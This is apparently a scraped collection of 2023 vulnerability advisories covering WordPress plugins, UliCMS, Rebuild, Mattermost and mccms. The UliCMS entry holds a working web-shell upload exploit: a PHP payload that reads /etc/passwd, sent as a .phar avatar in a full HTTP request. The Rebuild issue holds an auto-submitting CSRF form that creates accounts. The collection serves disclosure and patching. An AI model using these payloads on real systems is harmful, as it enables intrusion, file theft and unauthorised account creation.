The AI ChatBot WordPress plugin before 4.4.9 does not have authorisation and CSRF in the AJAX action responsible to update the OpenAI settings, allowing any authenticated users, such as subscriber to update them. Furthermore, due to the lack of escaping of the settings, this could also lead to Stored XSS

CVE-2023-1651

The AI ChatBot WordPress plugin before 4.4.9 does not have authorisation and CSRF in a function hooked to init, allowing unauthenticated users to update some settings, leading to Stored XSS due to the lack of escaping when outputting them in the admin dashboard

CVE-2023-1660

Cross-Site Request Forgery (CSRF) in GitHub repository unilogies/bumsys prior to 2.1.1.

CVE-2023-2552

UliCMS version 2023-1 Sniffing-Vicuna suffers from a remote shell upload vulnerability.

#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)  
#Application: Ulicms  
#Version: 2023.1-sniffing-vicuna  
#Bugs:  RCE  
#Technology: PHP  
#Vendor URL: https://en.ulicms.de/  
#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip  
#Date of found: 04-05-2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux 

2. Technical Details & POC  
========================================  
steps: 

1. Login to account and edit profile.

2.Upload new Avatar

3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error

payload: <?php echo system("cat /etc/passwd"); ?>

poc request :

POST /dist/admin/index.php HTTP/1.1  
Host: localhost  
Content-Length: 1982  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv  
Connection: close

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="csrf_token"

e2d428bc0585c06c651ca8b51b72fa58  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sClass"

UserController  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="sMethod"

update  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="avatar"; filename="salam.phar"  
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd"); ?>

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="edit_admin"

edit_admin  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="id"

12  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="firstname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="lastname"

account1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="email"

account1@test.com  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="password_repeat"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="group_id"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="secondary_groups[]"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="homepage"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="html_editor"

ckeditor  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="admin"

1  
------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="default_language"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy  
Content-Disposition: form-data; name="about_me"

------WebKitFormBoundaryYB7QS1BMMo1CXZVy--

response:

Error  
GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67  
Stack trace:  
#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#7 {main}

Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73  
Stack trace:  
#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()  
#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()  
#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()  
#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()  
#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()  
#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()  
#6 {main}

4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)

UliCMS 2023-1 Sniffing-Vicuna Shell Upload

Cross-Site Request Forgery (CSRF) vulnerability in PeepSo Community by PeepSo plugin <= 6.0.2.0 versions.

**Solution**

Update the WordPress Community by PeepSo plugin to the latest available version (at least 6.0.3.0).

Cat discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Community by PeepSo Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 6.0.3.0.

**1 other known vulnerability for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-25967: WordPress Community by PeepSo – Social Network, Membership, Registration, User Profiles plugin <= 6.0.2.0 - Cross Site Request Forgery (CSRF) - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Pods Framework Team Pods – Custom Content Types and Fields plugin <= 2.9.10.2 versions.

**Solution**

Update the WordPress Pods plugin to the latest available version (at least 2.9.11).

Found this useful? Thank Rafshanzani Suhada for reporting this vulnerability. Buy a coffee ☕

Rafshanzani Suhada discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Pods Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 2.9.11.

**5 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23790: WordPress Pods – Custom Content Types and Fields plugin <= 2.9.10.2 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Tips and Tricks HQ, Ruhul Amin Category Specific RSS feed Subscription plugin <= v2.1 versions.

**Solution**

Update the WordPress Category Specific RSS feed Subscription plugin to the latest available version (at least v2.2).

Found this useful? Thank yuyudhn for reporting this vulnerability. Buy a coffee ☕

yuyudhn discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Category Specific RSS feed Subscription Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version v2.2.

**2 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-22691: WordPress Category Specific RSS feed Subscription plugin <= v2.1 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

A vulnerability has been found in Rebuild 3.2 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to change the configuration settings. VDB-227866 is the identifier assigned to this vulnerability.

如确认漏洞，恳请厂商回复确认漏洞帮助测试人员备案，谢谢！

**版本 / Version**

V3.2 版本

**什么问题 / What's the problem**

部门用户创建接口存在CSRF漏洞  
  
接口正常请求报文如下：  
  
可以看到Content-Type默认为text/plain，且数据以json格式传输，因为cookie跨域限制不严导致可构造恶意网页实现CSRF漏洞

**如何复现此问题 / How to reproduce this problem**

构造POC如下：

    <html>
      
      <body>
        <form action="https://nightly.getrebuild.com/app/entity/record-save" method="POST" enctype="text/plain">
          <input type="hidden" name="&#123;&quot;loginName&quot;&#58;&quot;syh2&quot;&#44;&quot;password&quot;&#58;&quot;buy8l9rB&#33;8&quot;&#44;&quot;gangwei6&quot;&#58;&quot;668&#45;01871e762adb15ce&quot;&#44;&quot;gerendianhua&quot;&#58;&quot;&quot;&#44;&quot;createdBy&quot;&#58;&quot;001&#45;0000000000000001&quot;&#44;&quot;createdOn&quot;&#58;&quot;2023&#45;04&#45;17&#32;01&#58;36&#58;41&quot;&#44;&quot;fullName&quot;&#58;&quot;syh&quot;&#44;&quot;email&quot;&#58;&quot;su&#64;123&#46;com&quot;&#44;&quot;workphone&quot;&#58;&quot;13684122536&quot;&#44;&quot;deptId&quot;&#58;&quot;002&#45;0186693a0e7903c3&quot;&#44;&quot;metadata&quot;&#58;&#123;&quot;entity&quot;&#58;&quot;User&quot;&#44;&quot;id&quot;&#58;&quot;&quot;&#125;&#44;&quot;hack&quot;&#58;&quot;" value="&quot;&#125;" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

正常POST表单会有=导致json格式错误，我们可以通过构造name value使其拼接，从而使=成为字段值，效果如下

          <input type="hidden" name="{"loginName":"syh2","password":"buy8l9rB!8","gangwei6":"668-01871e762adb15ce","gerendianhua":"","createdBy":"001-0000000000000001","createdOn":"2023-04-17 01:36:41","fullName":"syh","email":"su@123.com","workphone":"13684122536","deptId":"002-0186693a0e7903c3","metadata":{"entity":"User","id":""},"hack":"" value=""}" />
    

**利用测试**  
使用POC搭建网页，访问该恶意网站：  
  
可以看到成功调用接口，成功添加账户  

**漏洞修复建议**

限制Content-Type为application/json  
或对cookie增加跨域限制，即SameSite设置为Lax

**测试单位**

山东大学网络空间安全学院

CVE-2023-2474: 部门用户创建接口存在CSRF漏洞 · Issue #I6W4M2 · RB企业管理系统/rebuild_CRM_ERP_库存生产管理系统 - Gitee.com

Mattermost Desktop App fails to validate a mattermost server redirection and navigates to an arbitrary website


CVE-2023-2000: Security Updates

mccms v2.6.3 is vulnerable to Cross Site Request Forgery (CSRF).

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Tag

#csrf